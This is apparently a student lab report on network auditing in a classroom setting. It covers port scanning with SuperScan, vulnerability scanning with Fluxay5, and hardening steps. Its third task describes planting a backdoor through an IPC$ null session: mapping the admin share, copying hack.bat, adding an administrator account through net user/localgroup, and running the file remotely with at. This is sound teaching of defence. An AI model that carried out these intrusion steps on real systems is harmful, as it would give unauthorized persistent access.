网络审计实验报告
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验三:网络审计实验
一、实验目的
使学生掌握网络端口扫描器的使用方法,熟悉常见端口和其对应的服务程序,掌握发现系统漏洞的方法。
掌握综合扫描及安全评估工具的使用方法,了解进行简单系统漏洞入侵的方法,了解常见的网络和系统漏洞以及其安全防护方法。
二、实验环境(实验所使用的器件、仪器设备名称及规格)
Windows 操作系统、SuperScan 端口扫描工具、流光 Fluxay5 综合扫描工具。
三、实验任务及其要求
任务一:使用 Superscan 端口扫描工具并分析结果。
任务二:使用综合扫描工具 Fluxay5 并分析结果。
任务三:进行简单的攻击。
四、实验过程及分析
任务一:使用 Superscan 端口扫描工具并分析结果
分组角色:学生 A、学生 B 互相扫描对方主机。
实验步骤:
(1)在命令符提示下输入 IPCONFIG 查询自己的 IP 地址(本机的IP地址为192.168.0.10 对方的IP地址为192.168.0.7)。
(2)在 Superscan 中的 Hostname Lookup 栏中,输入同组学生主机的 IP 地址(192.168.0.7),可通过单击Lookup 按钮获得主机名(如图 1 所示)。
图 1 获得对方主机用户名
(3)设置 IP 栏、Scan type 栏、Scan 栏,使其对同组学生主机的所有端口以默认的时间参数进行扫描(如图 2 所示)。
图 2 配置扫描参数
(4)根据扫描结果分析主机开放的端口类型和对应的服务程序(如图 3 所示)。
图 3 扫描结果
(5)通过“控制面板”的“管理工具”中的“服务”配置(如图 4 所示) ,尝试关闭或开放目标主机上的部分服务,重新扫描,观察扫描结果的变化。
图 4 查看未修改时服务状态
常见端口的关闭方法:
1、关闭 79 等端口:关闭 Simple TCP/IP Service,支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭 80 端口:关掉 WWW 服务。
在“服务”中显示名称为“World Wide Web Publishing Service”,通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉 25 端口:关闭 Simple Mail Transport Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。
4、关掉 21 端口:关闭 FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉 23 端口:关闭 Telnet 服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、关掉 139 端口,139 端口是 NetBIOS Session 端口,用来文件和打印共享,关闭 139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet 协议(TCP/IP)”属性,进入“高级 TCP/IP 设置”“WINS 设置”里面有一项“禁用 TCP/IP 的NETBIOS”,打勾就关闭了 139 端口(如图 5 所示)。
图 5 关掉139 端口
利用 TCP/IP 筛选:网上邻居属性-本地连接属性-常规-internet 协议 (TCP/IP) 属性-高级-选项-TCP/IP 筛选-属性-TCP 端口-只允许 139,445,这样其他端口就都被关闭了(如
图 6、7所示)。
图 6 只允许139,445 通过
图7 结果扫描图
任务二:使用综合扫描工具Fluxay5并分析结果
图 8 各部份功能图
1: 暴力破解的设置区域
2:控制台输出
3:扫描出来的典型漏洞列表
4:扫描或者暴力破解成功的用户帐号
5:扫描和暴力破解的速度控制
6:扫描和暴力破解时的状态显示
7:中止按钮
8:探测记录查找
基本设置如下(如图 9 所示):
图 9 基本设置图
选择“文件(F)”→“高级扫描向导(W)”可打开高级扫描向导,设置扫描参数。
扫描结束后,流光会自动打开 HTML 格式的扫描报告,而且还把可利用的主机列在流光界面的最下方。
单击主机列表中的主机便可以直接对目标主机进行连接操作(如图 10 所示)
对目标主机进行连接操作示意图
除了使用“高级扫描向导”配置高级扫描外,还可以在探测菜单中直接选取高级扫描工具设置(如图 11 所示):
图 11 探测菜单中直接选取高级扫描工具设置图
分组角色:学生 A、学生 B 互相扫描对方主机。
实验步骤:
(1)开放 FTP 服务,允许匿名连接(此处扫描的主机IP地址为192.168.0.145)。
(2)打开流光 FLUXAY5 工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描(如图 12 所示)。
图 12 扫描结果
(3)仔细观察扫描结果,分析同组学生主机上存在的各种漏洞。
(4)根据扫描结果分析 FTP 漏洞:如结果显示有漏洞,则利用“流光”提供的入侵菜单进行 FTP 连接,尝试上传或下载文件(如图 13、14 所示)。
图 13 建立ftp连接
图 14 尝试上传文件
(5)根据扫描结果分析 IPC$漏洞:IPC 是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用 IPC$,连接者可以与目标主机建立一个空连接而无需用户名和密码,从而可以得到目标主机上的用户列表,并可能破解用户密码。
IPC$相关命令:
1.建立和目标的 ipc$连接命令:net use \\目标 IP\ipc$ “密码” /user:“ADMIN”(管理员账号),如:net use \\19
2.168.27.128\ipc$ “”/user:"administrator";
2.映射网络驱动器命令(将目标主机的盘映射到本地磁盘):net use 本地盘符 \\目标 IP \盘符$,如:net use z: \\192.168.27.128\c$;
3.和目标建立了 ipc$后,则可直接用 IP 加盘符加$访问。
比如:copy 文件名\\IP\盘符$\路径\文件名,如:copy hack.bat \\192.168.27.128\c$,也可直接对映射为本地磁盘的网络驱动器操作。
4.管理计算机上面的账号命令:net user
查看账号命令:net user
建立账号命令:net user name passwd/add( net user sysbak 123456/add : 添加用户名为sysback,密码为123456的账号)
删除账号命令:net user name/delete
5.管理工作组命令:net localgroup 组名用户名/add[delete]
如:net localgroup administrators sysback/add。
该命令表示把sysback用户添加到管理员组(administrators)。
6.查看目标计算机的系统时间:net time \\ip
7.在远程主机上建立计划任务:at\\IP TIME COMMAND
at \\192.168.27.128 13:45 c:\hack.bat(该命令表示在下午13点45分执行目标主机C盘中的hack.bat 文件,时间一定要晚于当前远程主机系统时间)
8.删除和目标的ipc$链接命令:net use \\IP\ipc$/del
9.断开所有ipc$链接:net use */del
10.禁止建立空连接:运行regedit,找到主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA],把Restrict
Anonymous(DWORD)的键值改为:00000001.
11.禁止自动打开默认共享:找到主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \ Services\LanmanServer\Parameters],把AutoShareServer(DWORD)的键值改为:00000000,如果不存在,就新建一个该键值。
任务三:利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵,步骤:
1.编写批处理文件hack.bat ,文件中包含两个命令:1)建立一个账号,2)将新账号加入administrators组。
2.使用net命令与目标主机进行连接。
3.将批处理文件hack.bat拷贝到目标主机上。
4.通过计划任务使目标主机执行hack.bat文件。
5.断开所有ipc$连接。
6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。
7.删除和目标主机的连接。
执行安全防护措施:
1.目标主机对注册表进行了修改:禁止建立空链接,禁止自动打开默认共享。
2.重新使用net命令和目标主机建立连接,观察目标结果是否变化。
五、实验结果总结
通过本次实验掌握了网络端口扫描器的使用方法,熟悉常见端口和其对应的服务程序,掌握打开关闭各个基本服务的方法。
掌握发现系统漏洞的方法。
掌握综合扫描及安全评估工具的使用方法,了解进行简单系统漏洞入侵的方法,了解常见的网络和系统漏洞以及其安全防护方法。